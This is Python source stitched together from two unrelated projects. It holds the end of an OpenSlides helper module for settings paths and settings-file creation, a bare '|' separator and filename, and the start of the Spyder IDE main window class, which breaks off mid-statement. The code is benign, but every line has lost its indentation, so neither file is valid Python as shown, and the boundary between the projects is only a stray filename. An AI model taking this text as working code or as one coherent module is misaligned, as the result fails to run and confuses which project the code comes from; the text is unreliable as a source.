class DatabaseInSettingsError(Exception):
pass
class UnknownCommand(Exception):
pass
class ExceptionArgumentParser(argparse.ArgumentParser):
def error(self, message: str) -> NoReturn:
raise UnknownCommand(message)
def detect_openslides_type() -> str:
"""
Returns the type of this OpenSlides version.
"""
if sys.platform == "win32":
if os.path.basename(sys.executable).lower() == "openslides.exe":
# Note: sys.executable is the path of the *interpreter*
# the portable version embeds python so it *is* the interpreter.
# The wrappers generated by pip and co. will spawn the usual
# python(w).exe, so there is no danger of mistaking them
# for the portable even though they may also be called
# openslides.exe
openslides_type = WINDOWS_PORTABLE_VERSION
else:
openslides_type = WINDOWS_VERSION
else:
openslides_type = UNIX_VERSION
return openslides_type
def get_default_settings_dir(openslides_type: str = None) -> str:
"""
Returns the default settings path according to the OpenSlides type.
The argument 'openslides_type' has to be one of the three types mentioned in
openslides.utils.main.
"""
if openslides_type is None:
openslides_type = detect_openslides_type()
if openslides_type == UNIX_VERSION:
parent_directory = os.environ.get(
"XDG_CONFIG_HOME", os.path.expanduser("~/.config")
)
elif openslides_type == WINDOWS_VERSION:
parent_directory = get_win32_app_data_dir()
elif openslides_type == WINDOWS_PORTABLE_VERSION:
parent_directory = get_win32_portable_dir()
else:
raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")
return os.path.join(parent_directory, "openslides")
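# Example of the resolved default settings directory (illustrative only; the
# actual value depends on the platform and environment):
#
#   get_default_settings_dir(UNIX_VERSION)
#   # -> '~/.config/openslides' (or '$XDG_CONFIG_HOME/openslides' when set)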
def get_local_settings_dir() -> str:
"""
    Returns the path to the local settings directory.
    On Unix systems: 'personal_data/var/'
"""
return os.path.join("personal_data", "var")
def setup_django_settings_module(
settings_path: str = None, local_installation: bool = False
) -> None:
"""
    Sets the environment variable ENVIRONMENT_VARIABLE, i.e.
    'DJANGO_SETTINGS_MODULE', to the given settings.
If no settings_path is given and the environment variable is already set,
then this function does nothing.
If the argument settings_path is set, then the environment variable is
always overwritten.
"""
if settings_path is None and os.environ.get(ENVIRONMENT_VARIABLE, ""):
return
if settings_path is None:
if local_installation:
settings_dir = get_local_settings_dir()
else:
settings_dir = get_default_settings_dir()
settings_path = os.path.join(settings_dir, "settings.py")
settings_file = os.path.basename(settings_path)
settings_module_name = ".".join(settings_file.split(".")[:-1])
if "." in settings_module_name:
raise ImproperlyConfigured(
"'.' is not an allowed character in the settings-file"
)
    # Change the python path. Also set the PYTHONPATH environment variable so
    # that the change to the python path survives a reload.
settings_module_dir = os.path.abspath(os.path.dirname(settings_path))
sys.path.insert(0, settings_module_dir)
try:
os.environ["PYTHONPATH"] = os.pathsep.join(
(settings_module_dir, os.environ["PYTHONPATH"])
)
except KeyError:
        # The environment variable is not set
os.environ["PYTHONPATH"] = settings_module_dir
# Set the environment variable to the settings module
os.environ[ENVIRONMENT_VARIABLE] = settings_module_name
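# Minimal usage sketch (hypothetical path, for illustration only):
#
#   setup_django_settings_module('/home/user/.config/openslides/settings.py')
#   # afterwards:
#   #   sys.path starts with '/home/user/.config/openslides'
#   #   os.environ['DJANGO_SETTINGS_MODULE'] == 'settings'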
def get_default_settings_context(user_data_dir: str = None) -> Dict[str, str]:
"""
Returns the default context values for the settings template:
    'openslides_user_data_dir', 'import_function' and 'debug'.
    The argument 'user_data_dir' is a given path for user specific data or None.
"""
# Setup path for user specific data (SQLite3 database, media, ...):
# Take it either from command line or get default path
default_context = {}
if user_data_dir:
default_context["openslides_user_data_dir"] = repr(user_data_dir)
default_context["import_function"] = ""
else:
openslides_type = detect_openslides_type()
if openslides_type == WINDOWS_PORTABLE_VERSION:
default_context[
"openslides_user_data_dir"
] = "get_win32_portable_user_data_dir()"
default_context[
"import_function"
] = "from openslides.utils.main import get_win32_portable_user_data_dir"
else:
data_dir = get_default_user_data_dir(openslides_type)
default_context["openslides_user_data_dir"] = repr(
os.path.join(data_dir, "openslides")
)
default_context["import_function"] = ""
default_context["debug"] = "False"
return default_context
def get_default_user_data_dir(openslides_type: str) -> str:
"""
Returns the default directory for user specific data according to the OpenSlides
type.
The argument 'openslides_type' has to be one of the three types mentioned
in openslides.utils.main.
"""
if openslides_type == UNIX_VERSION:
default_user_data_dir = os.environ.get(
"XDG_DATA_HOME", os.path.expanduser("~/.local/share")
)
elif openslides_type == WINDOWS_VERSION:
default_user_data_dir = get_win32_app_data_dir()
elif openslides_type == WINDOWS_PORTABLE_VERSION:
default_user_data_dir = get_win32_portable_dir()
else:
raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")
return default_user_data_dir
def get_win32_app_data_dir() -> str:
"""
Returns the directory of Windows' AppData directory.
"""
shell32 = ctypes.WinDLL("shell32.dll") # type: ignore
SHGetFolderPath = shell32.SHGetFolderPathW
SHGetFolderPath.argtypes = (
ctypes.c_void_p,
ctypes.c_int,
ctypes.c_void_p,
ctypes.c_uint32,
ctypes.c_wchar_p,
)
SHGetFolderPath.restype = ctypes.c_uint32
CSIDL_LOCAL_APPDATA = 0x001C
MAX_PATH = 260
buf = ctypes.create_unicode_buffer(MAX_PATH)
res = SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, 0, buf)
if res != 0:
# TODO: Write other exception
raise Exception("Could not determine Windows' APPDATA path")
return buf.value # type: ignore
def get_win32_portable_dir() -> str:
"""
Returns the directory of the Windows portable version.
"""
# NOTE: sys.executable will be the path to openslides.exe
# since it is essentially a small wrapper that embeds the
# python interpreter
portable_dir = os.path.dirname(os.path.abspath(sys.executable))
try:
fd, test_file = tempfile.mkstemp(dir=portable_dir)
except OSError:
raise PortableDirNotWritable(
"Portable directory is not writeable. "
"Please choose another directory for settings and data files."
)
else:
os.close(fd)
os.unlink(test_file)
return portable_dir
def get_win32_portable_user_data_dir() -> str:
"""
    Returns the user data directory for the Windows portable version.
"""
return os.path.join(get_win32_portable_dir(), "openslides")
def write_settings(
settings_dir: str = None,
settings_filename: str = "settings.py",
template: str = None,
**context: str,
) -> str:
"""
Creates the settings file at the given dir using the given values for the
file template.
    Returns the path to the created settings.
"""
if settings_dir is None:
settings_dir = get_default_settings_dir()
settings_path = os.path.join(settings_dir, settings_filename)
if template is None:
with open(
os.path.join(os.path.dirname(__file__), "settings.py.tpl")
) as template_file:
template = template_file.read()
# Create a random SECRET_KEY to put it in the settings.
# from django.core.management.commands.startproject
chars = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)"
context.setdefault("secret_key", get_random_string(50, chars))
for key, value in get_default_settings_context().items():
context.setdefault(key, value)
content = template % context
settings_module = os.path.realpath(settings_dir)
if not os.path.exists(settings_module):
os.makedirs(settings_module)
with open(settings_path, "w") as settings_file:
settings_file.write(content)
if context["openslides_user_data_dir"] == "get_win32_portable_user_data_dir()":
openslides_user_data_dir = get_win32_portable_user_data_dir()
else:
openslides_user_data_dir = context["openslides_user_data_dir"].strip("'")
os.makedirs(os.path.join(openslides_user_data_dir, "static"), exist_ok=True)
return os.path.realpath(settings_path)
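# Typical call (illustrative; the directory is an assumption, not a value from
# a real deployment): writes '<settings_dir>/settings.py' from the bundled
# template, filling in a random SECRET_KEY plus the default context values.
#
#   path = write_settings(settings_dir='/tmp/openslides-conf', debug='True')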
def open_browser(host: str, port: int) -> None:
"""
Launches the default web browser at the given host and port and opens
the webinterface. Uses start_browser internally.
"""
if host == "0.0.0.0":
# Windows does not support 0.0.0.0, so use 'localhost' instead
start_browser(f"http://localhost:{port}")
else:
start_browser(f"http://{host}:{port}")
def start_browser(browser_url: str) -> None:
"""
Launches the default web browser at the given url and opens the
webinterface.
"""
try:
browser = webbrowser.get()
except webbrowser.Error:
print("Could not locate runnable browser: Skipping start")
else:
def function() -> None:
# TODO: Use a nonblocking sleep event here.
time.sleep(1)
browser.open(browser_url)
thread = threading.Thread(target=function)
thread.start()
def get_database_path_from_settings() -> Optional[str]:
"""
Retrieves the database path out of the settings file. Returns None,
if it is not a SQLite3 database.
Needed for the backupdb command.
"""
from django.conf import settings as django_settings
from django.db import DEFAULT_DB_ALIAS
db_settings = django_settings.DATABASES
default = db_settings.get(DEFAULT_DB_ALIAS)
if not default:
raise DatabaseInSettingsError("Default databases is not configured")
database_path = default.get("NAME")
if not database_path:
raise DatabaseInSettingsError("No path or name specified for default database.")
if default.get("ENGINE") != "django.db.backends.sqlite3":
database_path = None
return database_path
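# Example (illustrative): with the default SQLite3 backend this returns the
# database file path from the settings (e.g. a 'db.sqlite3' inside the user
# data directory, depending on the settings template); for any other engine
# the function returns None.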
def is_local_installation() -> bool:
"""
Returns True if the command is called for a local installation
This is the case if manage.py is used, or when the --local-installation flag is set.
"""
return "--local-installation" in sys.argv or "manage.py" in sys.argv[0]
def is_windows() -> bool:
"""
Returns True if the current system is Windows. Returns False otherwise.
"""
return sys.platform == "win32"
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import re
import shutil
import signal
import socket
import glob
import subprocess
import sys
import threading
import traceback
import importlib
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QDesktopWidget, QDockWidget,
QMainWindow, QMenu, QMessageBox, QShortcut,
QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
import qdarkstyle
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) imports of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, get_versions, __docs_url__)
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
get_python_doc_path, qt_message_handler,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_path,
get_module_source_path, get_safe_mode,
is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.utils.image_path_manager import get_image_path
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_anaconda, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import (configparser as cp, is_text_string,
PY3, qbytearray_to_str, to_text_string)
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.programs import is_module_installed
from spyder.utils.qthelpers import (create_action, add_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri,
MENU_SEPARATOR, qapplication, start_file)
from spyder.app.solver import find_external_plugins, solve_plugin_dependencies
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
# Version passed to saveState/restoreState
WINDOW_STATE_VERSION = 1
#==============================================================================
# Install Qt message handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name):
"""
        Return a plugin instance by providing the plugin name.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
raise SpyderAPIError('Plugin "{}" not found!'.format(plugin_name))
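    # Usage sketch (illustrative): plugin names are the values defined in
    # spyder.api.plugins.Plugins, e.g.
    #
    #   console = main_window.get_plugin(Plugins.Console)
    #
    # A SpyderAPIError is raised when no plugin with that name is registered.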
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.CONF_SECTION] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
else:
self._INTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
self.set_splash(_("Loading {}...".format(plugin.get_name())))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
            self.show_plugin_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
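    # Registration sequence in brief (descriptive summary of the method above):
    # check plugin compatibility, wire the common plugin signals, call the
    # plugin's private and public register hooks, dock it if it is a
    # SpyderDockablePlugin, and finally register its actions' shortcuts plus a
    # "switch to <plugin>" application shortcut.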
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
            plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for signal in signals:
try:
signal.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
        shortcut = None
        try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
try:
# New API
if (self.last_plugin is not None
and self.last_plugin.get_widget().is_maximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
except AttributeError:
# Old API
if (self.last_plugin is not None and self.last_plugin._ismaximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugin(self, plugin):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [Console]
tabify = getattr(plugin, 'TABIFY', [self.get_plugin(Plugins.Console)])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
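    # Illustrative TABIFY declaration on a plugin class (hypothetical plugin,
    # shown only to clarify what tabify_plugin consumes):
    #
    #   class MyPlugin(SpyderDockablePlugin):
    #       NAME = 'my_plugin'
    #       TABIFY = [Plugins.Help, Plugins.Console]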
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
        so that plugins do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
            # Make spyder quit when pressing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.ipyconsole = None
self.variableexplorer = None
self.plots = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Quick Layouts and Dialogs
from spyder.preferences.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_interface_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.plugins_menu = None
self.plugins_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
# Set window title
self.set_window_title()
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
        if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.interface_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
        # The following flag remembers the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# The following flag is used to restore window's geometry when
# toggling out of fullscreen mode in Windows.
self.saved_normal_geometry = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError as e:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: #555555\'><b>netsh winsock reset"
"</b></span><br>"))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# --- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
        application menu uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
css_path = CSS_PATH
else:
css_path = CSS_PATH
# Main menu plugin
from spyder.api.widgets.menus import SpyderMenu
from spyder.plugins.mainmenu.plugin import MainMenu
from spyder.plugins.mainmenu.api import (
ApplicationMenus, HelpMenuSections, ViewMenuSections,
ToolsMenuSections, FileMenuSections)
self.mainmenu = MainMenu(self, configuration=CONF)
self.register_plugin(self.mainmenu)
# Toolbar plugin
from spyder.plugins.toolbar.plugin import Toolbar
self.toolbar = Toolbar(self, configuration=CONF)
self.register_plugin(self.toolbar)
# Preferences plugin
from spyder.plugins.preferences.plugin import Preferences
self.preferences = Preferences(self, configuration=CONF)
self.register_plugin(self.preferences)
# Shortcuts plugin
from spyder.plugins.shortcuts.plugin import Shortcuts
self.shortcuts = Shortcuts(self, configuration=CONF)
self.register_plugin(self.shortcuts)
logger.info("Creating core actions...")
# TODO: Change registration to use MainMenus
self.close_dockwidget_action = create_action(
